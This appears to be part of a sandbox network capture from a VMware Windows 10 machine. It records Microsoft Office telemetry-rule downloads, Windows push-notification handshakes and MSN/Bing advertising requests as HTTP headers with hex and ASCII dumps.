2024-12-07 09:51:42 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:43 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:42 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 7407b41f-701e-0098-7b04-48395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095142Z-r1cf579d7789trgthC1EWRkkfc00000002p0000000002hd2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:43 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.6	49807	20.198.119.143	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:43 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 33 34 49 38 75 67 5a 51 62 6b 47 53 31 5a 2f 4d 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 36 63 35 65 63 65 33 38 34 36 65 36 63 62 62 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 34I8ugZQbkGS1Z/M.1Context: 46c5ece3846e6cbb
2024-12-07 09:51:43 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-07 09:51:43 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 33 34 49 38 75 67 5a 51 62 6b 47 53 31 5a 2f 4d 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 36 63 35 65 63 65 33 38 34 36 65 36 63 62 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 62 36 65 63 70 44 62 6d 52 52 73 79 52 37 6c 75 38 45 34 45 6a 38 48 43 6c 43 2f 44 7a 51 33 4c 31 34 45 53 79 4c 79 75 61 34 47 7a 50 64 79 55 76 36 54 33 55 52 77 58 43 59 49 5a 63 55 47 31 78 32 42 76 36 4c 57 4f 4a 74 42 6c 76 50 4c 76 43 55 78 75 64 76 42 79 66 70 47 62 46 36 2b 32 4d 48 2b 62 2b 6f 37 70 2f 4b 6d 32 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 34I8ugZQbkGS1Z/M.2Context: 46c5ece3846e6cbb<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXb6ecpDbmRRsyR7lu8E4Ej8HClC/DzQ3L14ESyLyua4GzPdyUv6T3URwXCYIZcUG1x2Bv6LWOJtBlvPLvCUxudvByfpGbF6+2MH+b+o7p/Km2
2024-12-07 09:51:43 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 33 34 49 38 75 67 5a 51 62 6b 47 53 31 5a 2f 4d 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 36 63 35 65 63 65 33 38 34 36 65 36 63 62 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: 34I8ugZQbkGS1Z/M.3Context: 46c5ece3846e6cbb<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-07 09:51:44 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-07 09:51:44 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 30 70 69 5a 44 31 53 56 36 30 65 77 4d 68 4b 66 72 57 4a 30 46 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 0piZD1SV60ewMhKfrWJ0Fw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.6	49809	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:44 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:45 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:45 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: 49c2372f-d01e-0065-7b09-48b77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095145Z-r1cf579d778kr8xrhC1EWRfkun00000002f0000000001z1h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:45 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.6	49810	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:44 UTC	2591	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=88000045&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241207T095140Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=3ecff29cd2854316b86dbebd014c1a90&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=617973&metered=false&nettype=ethernet&npid=sc-88000045&oemName=lubufd%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=lubufd20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=617973&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1& [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZyMFkueVF6YQcCvSNBsYpIs4Qd9uYLd1XThPDga/VMIyCy+eMekKh4VSodnFDQ4n9lrkswnaNY8GYQ0LaPFIJzw8cdDovegxQEKXl3uwbQm7avPmaE22/9yfAjtJ4cL7TShgIQ87Ff8bCnRMjTRO0qGPO/W5zq3MPbRDpKMWsFHc5aDZtEbzuZQGnhsSTStKn842VbaQufNbSd6CdSpqbTxIG43Ig/Eeli/gDioys1MWFcaJqBXmLIogUf3OMZs+D0HT1mDwJTd/tcIfn07Ch6BOteR2+4D6lHkPYbyebVpVVGLe8Kh68xjqfktCQLZ9U0Rh7FfPDkLeF1AQDY7HWEQZgAAELvB9khYUktYC0gLd8ASgH6wAW+Pu+FJ/y3GtjMKW1gkUDUXNmQyQ/i1ijgYr1PAYLWHvCbbCNeSNFROlpoxJ+tjtLRfHCFhWVTMy2fdvAkF7XrzG5KCbs8arX4gUeyy890SjhCZJW3sZScGJEhj1V/VDPnpFsrHjgWdZT+g1n11Dclm5ZDUuKklw0SBsjxerjsLpMokLwUA1f5heiBTKw6cXOpu8cOeeNFjCn7oOt+rd4MoMVuW27Az6B3niPuM8EplRl4EDlX12y1OUSE92MXgSoOvapsw8BTUc5+4lbkyXrG6iPfyW8Jg4fRwFdLVV2aUnuGrw8a3BOQmzO7RZrHOLrPV2pdxCjcC6A59cjYEvikJHBycKMqpdZZiGM4rrgCV4YNPFh4SE+82pbzg3hkebn4ChYs7BiDpWq2PwmR137spkVGyusnf8EKexZPvkev4UH2YuI34Fuhcn0LhLyiN6wC8OX7WsGFimLguB2r+nwV5tRi/TjR+ogoMXP2MYzs3iqeg+v9jK1lHhuHTBwFtek9E6rJEqULB+HiBn4Tv0rKe8PDsvKY5KaTlUlWtylYFbndBiTjf/XzLJCjkwQfIZdgB&p= Cache-Control: no-cache MS-CV: KVxdpzFBRUKFlY1o.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-12-07 09:51:45 UTC	955	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2945 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"RADIDS":"1,P425116216-T1-C128000000001627409+B+P10+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}] X-ARC-SIG: Fv2Aiw4KarAQJRWB6g1HWU0FpKsN39i3qutz/4Xfbc9fYGroIc+VQPmMg3RkD7EXaH3j+MKvkQ2GxEkcI3y4FaTSkB0QRcvW/pu0x29dDblLbBl3dQtt9x3i3NVg4VixFj0pGXAQ3jkJK1I1fQGsz2hSO8VY9yG1DLFpI3lQyoOAOnrUQowVfPEseZyP/iQkiykAXUaNDs0ngVD5aFhB2Ngv2wXtz4m22oPGKKKpnWcb9Dj4aFA6Ju0N/78bjzMhTnrMGKNv0Cr3rwWyfDh1v1mnQkzOl8sLncul/AQFtI3TDbqIeKl1esVsoPIibQZ+VQ16hC3iBKbF3WPHoFf5Pg== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 07 Dec 2024 09:51:44 GMT Connection: close
2024-12-07 09:51:45 UTC	2945	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.6	49811	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:44 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:45 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:45 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 704c87bc-501e-00a0-2501-489d9f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095145Z-r1cf579d778lntp7hC1EWR9gg400000001hg000000000my0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:45 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.6	49812	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:44 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:45 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:45 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: a75b6259-601e-0084-3701-486b3f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095145Z-r1cf579d778dfdgnhC1EWRd3w000000001x0000000000psn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:45 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.6	49813	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:44 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:45 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:45 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 90ee9adf-001e-0014-3106-485151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095145Z-r1cf579d77867vg8hC1EWR8knc00000001u00000000031zk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:45 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.6	49814	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:44 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:45 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:45 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 1f654f05-501e-008f-5009-489054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095145Z-r1cf579d778qgtz2hC1EWRmgks00000001t00000000032y6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:45 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.6	49815	150.171.28.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:45 UTC	831	OUT	GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PYwZb5jzUszxXLhoKSvtQDVUCUz2DQQTbtfuHORf_W5QwxBOzlUBs9_EJcUhJgqAU9uX9BQciAkz3E-HbgLnhhz1TwN9WGpscjesnNfGXGZDVfXefq7gYrjtb6kzUmTiaEgS-OCNys-1nUln_W_a46hGPe1h6gVE1L8JE7qshXCdq7tj%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmZWRnZSUyZndpbmRvd3MtZWRnZSUzZmZvY3VzJTNkY29udmVuaW5jZSUyNnNvdXJjZSUzZGlwJTI2ZXMlM2QwJTI2Zm9ybSUzZE01MDBFNyUyNk9DSUQlM2RNNTAwRTc%26rlid%3D88a3a4f4da3e118b1d56c3a0c0aba7aa&TIME=20241207T095141Z&CID=531538185&EID=531538185&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: g.bing.com Connection: Keep-Alive
